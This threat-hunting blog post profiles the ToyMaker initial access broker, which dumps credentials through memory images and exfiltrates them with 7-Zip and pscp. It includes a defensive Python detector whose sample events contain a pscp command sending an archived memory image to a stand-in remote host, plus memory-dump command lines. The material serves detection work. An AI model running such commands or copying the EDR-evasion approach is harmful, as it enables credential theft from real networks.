Threat Hunters Corner: Unmasking the Toy Maker Initial Access Broker

by Josh Shepard on 2025 | 05


Welcome 

Welcome back to the Threat Hunters Corner! I’m Josh Shepard, Principal Threat Hunter at RADICL, and in this episode, we’ll be diving into the tools and tricks employed by a new Initial Access Broker known as ToyMaker.


RADBot Generated Text Summary 

Hey everyone, how's it going? 

Josh Shepard here, and on this edition of the Threat Hunters Corner, we're diving into the activities of a new initial access broker (IAB) known as Toy Maker. 

What is an Initial Access Broker? 

To refresh your memory, an initial access broker is a threat actor who specializes in gaining an initial, persistent foothold in a victim environment. They then sell that access to the highest bidder, typically ransomware-as-a-service (RaaS) operators or their affiliates. The buyer uses the foothold to move laterally through the network and deploy their ransomware or other payload of choice.

Who is Toy Maker? 

Toy Maker has been observed handing access to several ransomware gangs, including well-known groups such as Cactus. What sets Toy Maker apart is how they gather credentials: rather than dropping malware, they use a legitimate forensics tool to do it.

Credential Gathering Techniques 

Toy Maker relies on legitimate tools for credential access. Specifically, they use Magnet RAM Capture, a free (closed-source) digital forensics tool from Magnet Forensics that images the full physical memory of a live Windows system, to perform OS credential dumping. Because the image contains the memory of the LSASS (Local Security Authority Subsystem Service) process, the attacker can extract cached credentials from it offline, after the file has left the victim network, rather than touching LSASS directly on the host where EDR would be watching for it. Those credentials are bundled into the initial access offering, giving buyers a head start on lateral movement and privilege escalation.

Toolchain and Exfiltration

After capturing live system memory, Toy Maker keeps using legitimate tools to avoid detection. They use 7-Zip to compress the RAM image and the PuTTY SCP client (pscp.exe) to transfer the archive off-network. This trend toward malware-free intrusions built entirely on legitimate tooling is one of the themes of CrowdStrike's 2025 Global Threat Report.

Detection and Prevention Strategies

Blocklisting Tools 

If your organization does not use Magnet RAM Capture, or has standardized on a different forensics tool, consider blocklisting execution of the Magnet RAM Capture binaries. That can be done by file hash or by file name. Both are cheap for an attacker to change (rename the binary, or ship a build you have not hashed yet), so also alert on the command-line switches that are specific to Magnet RAM Capture. An attacker cannot change those without breaking the tool, which makes them a far more durable signal than a name or a hash.

Monitoring Data Exfiltration 

Another critical aspect to monitor is use of the PuTTY SCP client (pscp.exe) for data exfiltration. If your organization does not use PuTTY at all, you can implement blanket detection or prevention. If PuTTY is used, but only for interactive SSH, restrict the SCP client specifically so that it cannot be used for unauthorized transfers. Either way, do not rely on the file name alone: pscp can be renamed just like any other binary, so pair the name match with the outbound connection it makes and with its command line (a `user@host:path` destination, often alongside `-pw` to pass the password).
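The following is an added example, not RADICL's code and not anything ToyMaker's victims ran: it scores Sysmon-style process-creation events for the toolchain described above (Magnet RAM Capture by hash, by file name and by its command-line switches; 7-Zip archiving a memory image; pscp pushing the archive off-host), and it serves both the blocklisting section and the exfiltration section. The hash values, the sanctioned forensics host/user pair, the allowlists and the sample events are constructed placeholders; the `/accepteula` and `/go` switch names are assumed from Magnet RAM Capture's published command-line usage and should be confirmed against the build you actually have.

```python
"""Added example (not RADICL's code): score Sysmon-style process-creation events
for the ToyMaker toolchain: Magnet RAM Capture -> 7-Zip -> pscp. Placeholders only."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import ntpath
import re

MRC_BLOCKED_SHA256 = {"a" * 64}   # hypothetical: SHA-256 of the MRC builds you have inventoried
FORENSICS_ALLOWED = {("FORENSICS01", "CORP\\dfir.analyst")}   # hypothetical sanctioned (host, user)
PSCP_ALLOWED: set = set()          # empty: nobody in this org is expected to run pscp
EXFIL_WINDOW = timedelta(minutes=30)
DUMP_EXT = re.compile(r"\.(raw|mem|dmp)\b", re.I)   # memory-image extensions worth watching
REMOTE_SPEC = re.compile(r"\S+@\S+:")              # pscp destination: user@host:path


@dataclass
class Event:            # one process-creation record (Sysmon Event ID 1 style)
    ts: str
    host: str
    user: str
    image: str
    cmdline: str
    sha256: str = ""

    @property
    def exe(self) -> str:
        return ntpath.basename(self.image).lower()

    @property
    def when(self) -> datetime:
        return datetime.fromisoformat(self.ts)


@dataclass
class Finding:
    rule: str
    severity: str
    host: str
    detail: str


def has_switches(cmdline: str, *switches: str) -> bool:
    """True when every /switch is its own token; '/go:C:\\out' counts as '/go'."""
    tokens = {t.lower().split(":")[0] for t in cmdline.split()}
    return all(s.lower() in tokens for s in switches)


def evaluate(events: list) -> list:
    findings = []
    staged = {}   # host -> time a memory image was added to an archive
    for e in sorted(events, key=lambda x: x.when):
        sanctioned = (e.host, e.user) in FORENSICS_ALLOWED
        # 1. Known-bad hash: block outright unless this is a sanctioned forensics host/user.
        if e.sha256.lower() in MRC_BLOCKED_SHA256 and not sanctioned:
            findings.append(Finding("mrc_hash_blocklist", "block", e.host, e.image))
            continue
        # 2. File name: Magnet ships versioned binaries (MRCv120.exe); a new build evades a hash list.
        if re.fullmatch(r"mrcv\d+\.exe", e.exe) and not sanctioned:
            findings.append(Finding("mrc_filename", "high", e.host, e.image))
        # 3. Switches survive renaming. /accepteula alone is shared with Sysinternals tools,
        #    so require /go too (switch names assumed from MRC's documented CLI).
        elif has_switches(e.cmdline, "/accepteula", "/go") and not sanctioned:
            findings.append(Finding("mrc_cmdline", "high", e.host, e.cmdline))
        # 4. Staging: 7-Zip 'a' (add) with a memory image among its arguments.
        toks = e.cmdline.split()
        if (e.exe in ("7z.exe", "7za.exe") and len(toks) > 1 and toks[1].lower() == "a"
                and DUMP_EXT.search(e.cmdline)):
            staged[e.host] = e.when
            findings.append(Finding("memdump_archived", "medium", e.host, e.cmdline))
        # 5. pscp anywhere it is not sanctioned; escalate when it follows staging on the same host.
        if e.exe == "pscp.exe" and (e.host, e.user) not in PSCP_ALLOWED:
            severity = "high"
            t0 = staged.get(e.host)
            if t0 and e.when - t0 <= EXFIL_WINDOW and REMOTE_SPEC.search(e.cmdline):
                severity = "critical"   # image archived, then pushed to a remote host
            findings.append(Finding("pscp_exfil", severity, e.host, e.cmdline))
    return findings


SAMPLE = [  # constructed events for illustration, not real telemetry
    Event("2025-05-05T09:00:00", "WS01", "CORP\\jdoe", r"C:\Users\Public\MRCv120.exe",
          r"MRCv120.exe /accepteula /go /silent", "a" * 64),                  # blocklisted hash
    Event("2025-05-05T09:01:00", "WS02", "CORP\\jdoe", r"C:\Users\Public\svchost32.exe",
          r"svchost32.exe /accepteula /go:C:\Users\Public /silent", "b" * 64),  # renamed MRC
    Event("2025-05-05T09:05:00", "WS02", "CORP\\jdoe", r"C:\Program Files\7-Zip\7z.exe",
          r'7z.exe a C:\Users\Public\ws02.7z "C:\Users\Public\WS02-20250505.raw"'),
    Event("2025-05-05T09:12:00", "WS02", "CORP\\jdoe", r"C:\Users\Public\pscp.exe",
          r"pscp.exe -pw Hunter2 C:\Users\Public\ws02.7z ops@203.0.113.10:/tmp/"),
    Event("2025-05-05T09:20:00", "WS03", "CORP\\admin", r"C:\Tools\PsExec.exe",
          r"PsExec.exe /accepteula \\FS01 cmd"),                              # benign: no /go
    Event("2025-05-05T09:30:00", "WS03", "CORP\\admin", r"C:\Program Files\7-Zip\7z.exe",
          r"7z.exe a D:\backup\docs.7z D:\docs"),                              # benign archive
    Event("2025-05-05T09:40:00", "WS04", "CORP\\jdoe", r"C:\Temp\MRCv120.exe",
          r"MRCv120.exe /accepteula /go", "c" * 64),                            # build not in hash list
    Event("2025-05-05T10:00:00", "FORENSICS01", "CORP\\dfir.analyst", r"C:\Tools\MRCv120.exe",
          r"MRCv120.exe /accepteula /go /silent", "a" * 64),                  # sanctioned use
]
```

Running `evaluate(SAMPLE)` yields five findings: the blocklisted hash on WS01, the renamed binary on WS02 caught by its switches, the 7-Zip staging and the pscp upload on WS02 (the upload is escalated to critical because it follows the staging within the window), and the unlisted MRC build on WS04 caught by file name. The sanctioned analyst on FORENSICS01 produces nothing, and neither does PsExec's lone `/accepteula`, which is the reason the rule insists on `/go` as well.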

Tight Control Over Forensics Tools 

Digital forensics tools can pull an enormous amount of sensitive information out of a system, credentials included. Maintaining strict control over which of these tools may execute, where, and by whom is therefore essential. This not only helps you catch an intruder using them, but also ensures that your own analysts cannot run them outside of an authorized investigation.

Conclusion 

While Toy Maker employs legitimate tools to evade detection, understanding your environment and knowing which tools are in use can help you implement aggressive detection and prevention measures. This approach will not only help you catch Toy Maker but also deter other threat actors who might copy their techniques. 

That's it for this week's Threat Hunters Corner. If you have any questions, please feel free to reach out. Stay safe out there, and we'll see you next week.
